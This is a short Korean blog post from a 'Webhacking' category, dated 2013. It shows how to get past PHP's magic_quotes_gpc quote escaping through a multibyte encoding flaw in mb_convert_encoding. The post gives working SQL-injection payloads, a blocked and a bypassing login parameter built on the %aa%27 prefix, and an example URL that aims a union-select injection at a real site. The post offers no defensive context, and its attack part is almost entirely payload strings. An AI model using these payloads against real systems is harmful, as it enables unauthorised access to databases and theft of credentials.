Notice»

Recent Post»

Recent Comment»

Recent Trackback»

Archive»

« 2024/12 »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31
 

'magic'에 해당되는 글 1

  1. 2013.03.04 mb_convert_encoding 취약점으로 magic_quotes_gpc 우회하기
 

mb_convert_encoding 취약점으로 magic_quotes_gpc 우회하기

Webhacking | 2013. 3. 4. 01:02 | Posted by binaryU

PHP에서 SQL-Injection을 할때, magic_quotes_gpc 설정때문에 '입력이 안될경우 :

 

mb_convert_encoding 취약점 (%a1 ~ %fe 으로 magic_quotes_gpc %27 우회)


차단 : id=%27or%201=1%20and%20id=char(97,100,109,105,110)%23&pw=guest
우회 : id=%aa%27or%201=1%20and%20id=char(97,100,109,105,110)%23&pw=guest


예문) http://www.tistory.com/index.php?id=binaryu%aa%27/*&pw=*/union/**/select/**/3%23

저작자표시

'Webhacking' 카테고리의 다른 글

[PHP2EXE] PHP Compiler/Embedder 1.21  (0) 2013.03.04
.htaccess Attack Sample for PHP  (0) 2013.03.04
webhacking.kr 9번 문제 풀이  (1) 2013.03.04
Mysql Table Name Search  (0) 2013.03.04
아스키 코드표  (0) 2013.02.12
:
 

티스토리툴바